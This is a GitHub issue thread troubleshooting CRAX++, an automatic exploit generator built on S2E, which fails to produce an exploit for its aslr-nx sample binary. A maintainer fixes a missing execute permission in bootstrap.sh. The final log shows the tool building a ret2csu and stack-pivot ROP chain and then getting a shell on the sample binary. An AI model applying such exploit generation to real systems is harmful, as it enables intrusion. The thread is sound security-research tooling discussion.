CRAX++ exits immediately after executing aslr-nx sample binary without generating an exploit

Question

CRAX++ exits immediately after executing aslr-nx sample binary without generating an exploit

keis94 opened this issue 3 years ago · 3 comments

Description

CRAX++ exits immediately after executing aslr-nx sample binary that is introduced in BUILD.md, without producing an exploit for aslr-nx sample binary.

Any clues to working properly?

./launch-crax.sh

Starting libs2e...
Opening /dev/kvm
Initializing qemu64-s2e cpu
Using module /home/keis/s2e/install/share/libs2e/op_helper.bc.x86_64
S2E: output directory = "./s2e-out-0"
KLEE: WARNING: unsupported intrinsic llvm.rint.f64
KLEE: WARNING: unsupported intrinsic llvm.fmuladd.f64
Using log level override 'info'
Setting console level to 'info'
Creating plugin CorePlugin
Creating plugin BaseInstructions
Creating plugin HostFiles
Creating plugin Vmi
Creating plugin MemUtils
Creating plugin WebServiceInterface
Creating plugin ExecutionTracer
Creating plugin ModuleTracer
Creating plugin KeyValueStore
Creating plugin TranslationBlockCoverage
Creating plugin ModuleExecutionDetector
Creating plugin ForkLimiter
Creating plugin ProcessExecutionDetector
Creating plugin ModuleMap
Creating plugin MemoryMap
Creating plugin MultiSearcher
Creating plugin CUPASearcher
Creating plugin FunctionModels
Creating plugin LinuxMonitor
Creating plugin LuaBindings
Creating plugin LuaCoreEvents
Creating plugin CRAX
Initializing LuaBindings
Initializing LuaCoreEvents
LuaCoreEvents: Registering instrumentation for core signals
Initializing MultiSearcher
Initializing ForkLimiter
Initializing KeyValueStore
Initializing ExecutionTracer
Initializing WebServiceInterface
WebServiceInterface: SeedSearcher not present, seed statistics will not be available
WebServiceInterface: Recipe plugin not present, recipe statistics will not be available
Initializing Vmi
Initializing HostFiles
Initializing BaseInstructions
Initializing LinuxMonitor
Initializing ModuleMap
Initializing ProcessExecutionDetector
Initializing MemoryMap
Initializing CRAX
CRAX: Creating module: GuestOutput
CRAX: Creating module: IOStates
CRAX: Creating module: DynamicRop
CRAX: Creating technique: Ret2csu
CRAX: Creating technique: BasicStackPivoting
CRAX: Creating technique: Ret2syscall
Initializing MemUtils
Initializing FunctionModels
Initializing ModuleExecutionDetector
Initializing CUPASearcher
CUPASearcher: CUPASearcher is now active
Initializing TranslationBlockCoverage
Initializing ModuleTracer
Initializing CorePlugin
[Z3] Initializing
2 [State 0] Created initial state
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-nopiodelay [bit 1]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock [bit 3]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-asyncpf [bit 4]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-steal-time [bit 5]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-pv-eoi [bit 6]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock-stable-bit [bit 24]
Adding CPU (addr = 0x7f420400a750, size = 0x36ea0)
qemu-system-x86_64: warning: hub 0 is not connected to host network
s2e-block: dirty sectors on close:0
s2e-block: dirty after restore: 3984 (ro=1)
s2e-block: wasted sectors: 0
CRAX: Cannot resolve gadget: pop rax ; ret
11 [State 0] CRAX: onProcessLoad: s2ecmd
11 [State 0] CRAX: onProcessLoad: s2ecmd
11 [State 0] CRAX: onProcessLoad: s2ecmd
11 [State 0] CRAX: onProcessLoad: chmod
11 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f93c1f3a000 elf_entry=0x7f93c1f3a000 interp_load_addr=0x7f93c1f3a000
11 [State 0] CRAX: onProcessLoad: sym_stdin
11 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f4a47ae7000 elf_entry=0x7f4a47ae7000 interp_load_addr=0x7f4a47ae7000
11 [State 0] BaseInstructions: Inserted symbolic data @0x55cb5f982040 of size 0x400: CRAX='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' pc=0x55cb5f97f280
12 [State 0] BaseInstructions: Killing state 0
12 [State 0] Terminating state: State was terminated by opcode
            message: "program terminated"
            status: 0x0
All states were terminated
qemu-system-x86_64: terminating on signal 15 from pid 612401 (/home/keis/s2e/install/bin/qemu-system-x86_64)
s2e-block: dirty sectors on close:3984
Terminating node id 0 (instance slot 0)

How To Reproduce

Follow BUILD.md instructions and apply some workarounds.

Use s2ecmd get and s2ecmd put instead of s2eget and s2eput in bootstrap.sh

Fix libs2eplugins.patch to make it applicable to the latest S2E/s2e

diff --git a/patches/libs2eplugins.patch b/patches/libs2eplugins.patch
index 637874c..6a869c6 100644
--- a/patches/libs2eplugins.patch
+++ b/patches/libs2eplugins.patch
@@ -68,10 +68,8 @@ index e3b2d37..973c267 100644
      # Core plugins
      s2e/Plugins/Core/BaseInstructions.cpp
      s2e/Plugins/Core/HostFiles.cpp
-@@ -163,7 +196,7 @@ set(WERROR_FLAGS "-Werror -Wno-zero-length-array -Wno-c99-extensions          \
-                   -Wno-zero-length-array")
-
- set(COMMON_FLAGS "-D__STDC_FORMAT_MACROS -D_GNU_SOURCE -DNEED_CPU_H  -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -DTARGET_PHYS_ADDR_BITS=64")
+@@ -165,5 +198,5 @@ set(COMMON_FLAGS "-D__STDC_FORMAT_MACROS -D_GNU_SOURCE -DNEED_CPU_H  -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -DTARGET_PHYS_ADDR_BITS=64")
+ set(COMMON_FLAGS "${COMMON_FLAGS} -DLIBS2E_PLUGINS")
 -set(COMMON_FLAGS "${COMMON_FLAGS} -Wall -fPIC -fno-strict-aliasing -fexceptions -std=c++17")
 +set(COMMON_FLAGS "${COMMON_FLAGS} -Wall -fPIC -fno-strict-aliasing -fexceptions -fsized-deallocation -std=c++17")

Use debian-11.3-x86_64 image instead of debian-9.2.1-x86_64
- fix baseDirs in proxies/sym_stdin/s2e-config.template.lua accordingly
Build sym_stdin in debian:11.3 container image

Environment

host OS: Ubuntu 20.04.05

Answer 1 · 2023-03-06T14:40:51.000Z

I can reproduce this:

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [22:35]
> ./launch-crax.sh
Starting libs2e...
Opening /dev/kvm
Initializing qemu64-s2e cpu
Using module /home/aesophor/s2e/install/share/libs2e/op_helper.bc.x86_64
S2E: output directory = "./s2e-out-3"
KLEE: WARNING: unsupported intrinsic llvm.rint.f64
KLEE: WARNING: unsupported intrinsic llvm.fmuladd.f64
Using log level override 'info'
Setting console level to 'info'
Creating plugin CorePlugin
Creating plugin BaseInstructions
Creating plugin HostFiles
Creating plugin Vmi
Creating plugin MemUtils
Creating plugin WebServiceInterface
Creating plugin ExecutionTracer
Creating plugin ModuleTracer
Creating plugin KeyValueStore
Creating plugin TranslationBlockCoverage
Creating plugin ModuleExecutionDetector
Creating plugin ForkLimiter
Creating plugin ProcessExecutionDetector
Creating plugin ModuleMap
Creating plugin MemoryMap
Creating plugin MultiSearcher
Creating plugin CUPASearcher
Creating plugin FunctionModels
Creating plugin LinuxMonitor
Creating plugin LuaBindings
Creating plugin LuaCoreEvents
Creating plugin CRAX
Initializing LuaBindings
Initializing LuaCoreEvents
LuaCoreEvents: Registering instrumentation for core signals
Initializing MultiSearcher
Initializing ForkLimiter
Initializing KeyValueStore
Initializing ExecutionTracer
Initializing WebServiceInterface
WebServiceInterface: SeedSearcher not present, seed statistics will not be available
WebServiceInterface: Recipe plugin not present, recipe statistics will not be available
Initializing Vmi
Initializing HostFiles
Initializing BaseInstructions
Initializing LinuxMonitor
Initializing ModuleMap
Initializing ProcessExecutionDetector
Initializing MemoryMap
Initializing CRAX
CRAX: Creating module: GuestOutput
CRAX: Creating module: IOStates
CRAX: Creating module: DynamicRop
CRAX: Creating technique: Ret2csu
CRAX: Creating technique: AdvancedStackPivoting
CRAX: Creating technique: GotLeakLibc
CRAX: Creating technique: Ret2syscall
Initializing MemUtils
Initializing FunctionModels
Initializing ModuleExecutionDetector
Initializing CUPASearcher
CUPASearcher: CUPASearcher is now active
Initializing TranslationBlockCoverage
Initializing ModuleTracer
Initializing CorePlugin
[Z3] Initializing
1 [State 0] Created initial state
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-nopiodelay [bit 1]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock [bit 3]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-asyncpf [bit 4]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-steal-time [bit 5]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-pv-eoi [bit 6]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock-stable-bit [bit 24]
Adding CPU (addr = 0x7ff7b000a750, size = 0x36ea0)
qemu-system-x86_64: warning: hub 0 is not connected to host network
s2e-block: dirty sectors on close:0
s2e-block: dirty after restore: 3984 (ro=1)
s2e-block: wasted sectors: 0
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: chmod
8 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f1cef2bf000 elf_entry=0x7f1cef2bf000 interp_load_addr=0x7f1cef2bf000
8 [State 0] CRAX: onProcessLoad: sym_stdin
8 [State 0] BaseInstructions: Message from guest (0xffffc90000477a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7fe9d2222000 elf_entry=0x7fe9d2222000 interp_load_addr=0x7fe9d2222000
8 [State 0] BaseInstructions: Inserted symbolic data @0x565174afa040 of size 0x400: CRAX='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' pc=0x565174af7364
8 [State 0] BaseInstructions: Killing state 0
8 [State 0] Terminating state: State was terminated by opcode
            message: "program terminated"
            status: 0x0
All states were terminated
qemu-system-x86_64: terminating on signal 15 from pid 703803 (/home/aesophor/s2e/install/bin/qemu-system-x86_64)
s2e-block: dirty sectors on close:3984
Terminating node id 0 (instance slot 0)

Even instruction/syscall hooks are broken with the latest s2e, lol...

cc @LJP-TW Are you by any chance still working on CRAX++? If yes, have you encountered this problem recently?

Answer 2 · 2023-03-11T17:37:16.000Z

Okay I've found the problem: fork() exec() failed due to target executable missing the x permission.

Please edit bootstrap.sh and add this line.

prepare_target "${TARGET_PATH}"
prepare_target "./target" <-- add this line

I ran CRAX against aslr-nx and thankfully it still worked (lol)
Some other techniques might not work if you use debian 11 guest image.

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> ./launch-crax.sh
Starting libs2e...
Opening /dev/kvm
Initializing qemu64-s2e cpu
Using module /home/aesophor/s2e/install/share/libs2e/op_helper.bc.x86_64
S2E: output directory = "./s2e-out-29"
KLEE: WARNING: unsupported intrinsic llvm.rint.f64
KLEE: WARNING: unsupported intrinsic llvm.fmuladd.f64
Using log level override 'info'
Setting console level to 'info'
Creating plugin CorePlugin
Creating plugin BaseInstructions
Creating plugin HostFiles
Creating plugin Vmi
Creating plugin MemUtils
Creating plugin WebServiceInterface
Creating plugin ExecutionTracer
Creating plugin ModuleTracer
Creating plugin KeyValueStore
Creating plugin TranslationBlockCoverage
Creating plugin ModuleExecutionDetector
Creating plugin ForkLimiter
Creating plugin ProcessExecutionDetector
Creating plugin ModuleMap
Creating plugin MemoryMap
Creating plugin MultiSearcher
Creating plugin CUPASearcher
Creating plugin FunctionModels
Creating plugin LinuxMonitor
Creating plugin LuaBindings
Creating plugin LuaCoreEvents
Creating plugin CRAX
Initializing LuaBindings
Initializing LuaCoreEvents
LuaCoreEvents: Registering instrumentation for core signals
Initializing MultiSearcher
Initializing ForkLimiter
Initializing KeyValueStore
Initializing ExecutionTracer
Initializing WebServiceInterface
WebServiceInterface: SeedSearcher not present, seed statistics will not be available
WebServiceInterface: Recipe plugin not present, recipe statistics will not be available
Initializing Vmi
Initializing HostFiles
Initializing BaseInstructions
Initializing LinuxMonitor
Initializing ModuleMap
Initializing ProcessExecutionDetector
Initializing MemoryMap
Initializing CRAX
CRAX: Creating module: GuestOutput
CRAX: Creating module: IOStates
CRAX: Creating module: DynamicRop
CRAX: Creating technique: Ret2csu
CRAX: Creating technique: BasicStackPivoting
CRAX: Creating technique: Ret2syscall
Initializing MemUtils
Initializing FunctionModels
Initializing ModuleExecutionDetector
Initializing CUPASearcher
CUPASearcher: CUPASearcher is now active
Initializing TranslationBlockCoverage
Initializing ModuleTracer
Initializing CorePlugin
[Z3] Initializing
1 [State 0] Created initial state
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-nopiodelay [bit 1]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock [bit 3]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-asyncpf [bit 4]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-steal-time [bit 5]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvm-pv-eoi [bit 6]
qemu-system-x86_64: warning: host doesn't support requested feature: CPUID.40000001H:EAX.kvmclock-stable-bit [bit 24]
Adding CPU (addr = 0x7f143400a750, size = 0x36ea0)
qemu-system-x86_64: warning: hub 0 is not connected to host network
s2e-block: dirty sectors on close:0
s2e-block: dirty after restore: 3984 (ro=1)
s2e-block: wasted sectors: 0
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: s2ecmd
8 [State 0] CRAX: onProcessLoad: chmod
8 [State 0] BaseInstructions: Message from guest (0xffffc9000043fa18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7ff2719f7000 elf_entry=0x7ff2719f7000 interp_load_addr=0x7ff2719f7000
9 [State 0] CRAX: onProcessLoad: chmod
9 [State 0] BaseInstructions: Message from guest (0xffffc9000043fa18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f94ae895000 elf_entry=0x7f94ae895000 interp_load_addr=0x7f94ae895000
9 [State 0] CRAX: onProcessLoad: sym_stdin
9 [State 0] BaseInstructions: Message from guest (0xffffc9000043fa18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7f3858472000 elf_entry=0x7f3858472000 interp_load_addr=0x7f3858472000
9 [State 0] BaseInstructions: Inserted symbolic data @0x561f2e70f040 of size 0x400: CRAX='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' pc=0x561f2e70c364
9 [State 0] CRAX: onProcessLoad: target
9 [State 0] BaseInstructions: Message from guest (0xffffc900004a7a18): elf_interpreter=/lib64/ld-linux-x86-64.so.2 interp_map_addr=7efd14e46000 elf_entry=0x7efd14e46000 interp_load_addr=0x7efd14e46000
9 [State 0] CRAX: onModuleLoad: ld-linux-x86-64.so.2
9 [State 0] ModuleExecutionDetector: loading id mod_0
9 [State 0] CRAX: onModuleLoad: target
9 [State 0] CRAX: syscall: 0xc (0x0, 0x7efd14e68ea2, 0x4d, 0x7efd14e68ea2, 0x7efd14e70e88, 0x1c)
9 [State 0] CRAX: syscall: 0x15 (0x7efd14e6ba40, 0x4, 0x7efd14e461c8, 0x8, 0x0, 0x0)
9 [State 0] CRAX: syscall: 0x101 (0xffffff9c, 0x7efd14e68be7, 0x80000, 0x0, 0x80000, 0x7efd14e68be7)
9 [State 0] CRAX: syscall: 0x5 (0x3, 0x7ffd139c5c40, 0x7ffd139c5c40, 0x0, 0x1, 0x7efd14e68be7)
9 [State 0] CRAX: syscall: 0x9 (0x0, 0x6746, 0x1, 0x2, 0x3, 0x0)
9 [State 0] CRAX: syscall: 0x3 (0x3, 0x6746, 0x1, 0x2, 0x3, 0x0)
10 [State 0] CRAX: syscall: 0x101 (0xffffff9c, 0x7efd14e72e00, 0x80000, 0x0, 0x80000, 0x7efd14e72e00)
10 [State 0] CRAX: syscall: 0x0 (0x3, 0x7ffd139c5de8, 0x340, 0x0, 0x80000, 0x7efd14e72e00)
10 [State 0] CRAX: syscall: 0x5 (0x3, 0x7ffd139c5c90, 0x7ffd139c5c90, 0x0, 0x1, 0x7efd14e72180)
10 [State 0] CRAX: syscall: 0x9 (0x0, 0x2000, 0x3, 0x22, 0xffffffff, 0x0)
10 [State 0] CRAX: syscall: 0x9 (0x0, 0x1d4680, 0x1, 0x802, 0x3, 0x0)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14c8a000, 0x15a000, 0x5, 0x812, 0x3, 0x22000)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14de4000, 0x4f000, 0x1, 0x812, 0x3, 0x17c000)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14e33000, 0x6000, 0x3, 0x812, 0x3, 0x1ca000)
10 [State 0] CRAX: syscall: 0x9 (0x7efd14e39000, 0x3680, 0x3, 0x32, 0xffffffff, 0x0)
10 [State 0] CRAX: syscall: 0x3 (0x3, 0x29, 0x0, 0x70000022, 0x6fffffff, 0xeffffef5)
10 [State 0] CRAX: syscall: 0x9e (0x1002, 0x7efd14e3e540, 0xffff8102eb1c11a0, 0x1, 0x7efd14e3e540, 0x90)
13 [State 0] CRAX: syscall: 0xa (0x7efd14e33000, 0x4000, 0x1, 0x468, 0x7efd14d02ef0, 0x7efd14e465e0)
14 [State 0] CRAX: syscall: 0xa (0x403000, 0x1000, 0x1, 0x48, 0x400588, 0x7efd14c72778)
14 [State 0] CRAX: syscall: 0xa (0x7efd14e70000, 0x1000, 0x1, 0x7efd14e70f78, 0x0, 0x7efd14c6d240)
14 [State 0] CRAX: syscall: 0xb (0x7efd14e3f000, 0x6746, 0x19a900000000, 0x7efd14e70f78, 0x0, 0x7efd14c6d240)
14 [State 0] CRAX: syscall: 0x1 (0x1, 0x7ffd139c4410, 0xc, 0x402004, 0x0, 0xc)
overflow me:14 [State 0] CRAX: libc base address: 0x7efd14c6ba30
14 [State 0] CRAX: syscall: 0x0 (0x0, 0x7ffd139c6a90, 0x400, 0xfffffffffffff4bd, 0x0, 0xc)
14 [State 0] CRAX: Detected symbolic RIP: 0x4141414141414141, original value was: 0x4011cd
14 [State 0] CRAX: Dumping CPU registers...
---------- [REGISTERS] ----------
RAX     0x0
RCX     0x7efd14d5478e
RDX     0x400
RBX     0x0
RSP     0x7ffd139c6ac0
RBP     (symbolic)
RSI     0x7ffd139c6a90
RDI     0x0
R8      0x0
R9      0xc
R10     0xfffffffffffff4bd
R11     0x246
R12     0x401090
R13     0x0
R14     0x0
R15     0x0
RIP     (symbolic)
14 [State 0] CRAX: Dumping memory map...
--------------- [VMMAP] ---------------
Start           End             Perm    Module
0x400000        0x401000        r--     target
0x401000        0x402000        r-x     target
0x402000        0x404000        r--     target
0x404000        0x405000        rw-     target
0x7efd14c68000  0x7efd14c8a000  r--     libc.so.6
0x7efd14c8a000  0x7efd14de4000  r-x     libc.so.6
0x7efd14de4000  0x7efd14e37000  r--     libc.so.6
0x7efd14e37000  0x7efd14e3f000  rw-     libc.so.6
0x7efd14e46000  0x7efd14e47000  r--     ld-linux-x86-64.so.2
0x7efd14e47000  0x7efd14e67000  r-x     ld-linux-x86-64.so.2
0x7efd14e67000  0x7efd14e6f000  r--     ld-linux-x86-64.so.2
0x7efd14e70000  0x7efd14e71000  r--     ld-linux-x86-64.so.2
0x7efd14e71000  0x7efd14e72000  rw-     ld-linux-x86-64.so.2
0x7ffd139c3000  0x7ffd139c7000  rw-     [stack]
14 [State 0] CRAX: No more dynamic ROP constraints to apply.
14 [State 0] CRAX: Dumping IOStates: [o, i1024]
1616 [State  0[State ] CRAX0: ] Cannot resolve gadget: CRAXpop rax ; ret:
Ret2syscall is still running, please wait...
16 [State 0] CRAX: Using core generator from module: IOStates
16 [State 0] CRAX: Initializing technique: Ret2csu
16 [State 0] CRAX: Found __libc_csu_init() at 0x4011d0
16 [State 0] CRAX: Initializing technique: BasicStackPivoting
16 [State 0] CRAX: Initializing technique: Ret2syscall
16 [State 0] CRAX: Adding exploit constraints...
16 [State 0] CRAX: Constraining RBP to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining RIP to p64(target_base + __libc_csu_init_gadget1) (concretized=0x401226)
16 [State 0] CRAX: Constraining 0x7ffd139c6ac0 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6ac8 to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining 0x7ffd139c6ad0 to p64(0x1) (concretized=0x1)
16 [State 0] CRAX: Constraining 0x7ffd139c6ad8 to p64(0x0) (concretized=0x0)
16 [State 0] CRAX: Constraining 0x7ffd139c6ae0 to p64(target_base + pivot_dest) (concretized=0x404840)
16 [State 0] CRAX: Constraining 0x7ffd139c6ae8 to p64(0x400) (concretized=0x400)
16 [State 0] CRAX: Constraining 0x7ffd139c6af0 to p64(target_base + __libc_csu_init_call_target) (concretized=0x402e48)
16 [State 0] CRAX: Constraining 0x7ffd139c6af8 to p64(target_base + __libc_csu_init_gadget2) (concretized=0x401210)
16 [State 0] CRAX: Constraining 0x7ffd139c6b00 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b08 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b10 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b18 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b20 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b28 to p64(0x4141414141414141) (concretized=0x4141414141414141)
16 [State 0] CRAX: Constraining 0x7ffd139c6b30 to p64(0x4141414141414141) (concretized=0x4141414141414141)
17 [State 0] CRAX: Constraining 0x7ffd139c6b38 to p64(target_base + target.sym['read']) (concretized=0x401070)
17 [State 0] CRAX: Constraining 0x7ffd139c6b40 to p64(target_base + target_pop_rbp_ret) (concretized=0x40115d)
17 [State 0] CRAX: Constraining 0x7ffd139c6b48 to p64(target_base + pivot_dest) (concretized=0x404840)
17 [State 0] CRAX: Constraining 0x7ffd139c6b50 to p64(target_base + target_leave_ret) (concretized=0x4011cc)
17 [State 0] CRAX: Switching to direct mode...
17 [State 0] CRAX: Generated exploit script: exploit_0.py
17 [State 0] Terminating state: End of exploit generation
All states were terminated
qemu-system-x86_64: terminating on signal 15 from pid 743692 (/home/aesophor/s2e/install/bin/qemu-system-x86_64)
s2e-block: dirty sectors on close:3984
Terminating node id 0 (instance slot 0)

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> ./exploit_0.py
zsh: permission denied: ./exploit_0.py

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> chmod u+x ./exploit_0.py

/home/aesophor/s2e/projects/sym_stdin [aesophor@aesophor-vm] [1:36]
> ./exploit_0.py
[+] Starting local process './ld-2.24.so': pid 743870
[*] Switching to interactive mode
$ ls
bootstrap.sh      project.json           s2e-out-17  s2e-out-29
bootstrap.sh.old  s2e-config.lua       s2e-out-18  s2e-out-3
exploit_0.py      s2e-config.template.lua  s2e-out-19  s2e-out-4
guest-tools32      s2e-last           s2e-out-2   s2e-out-5
guest-tools64      s2e-out-0           s2e-out-20  s2e-out-6
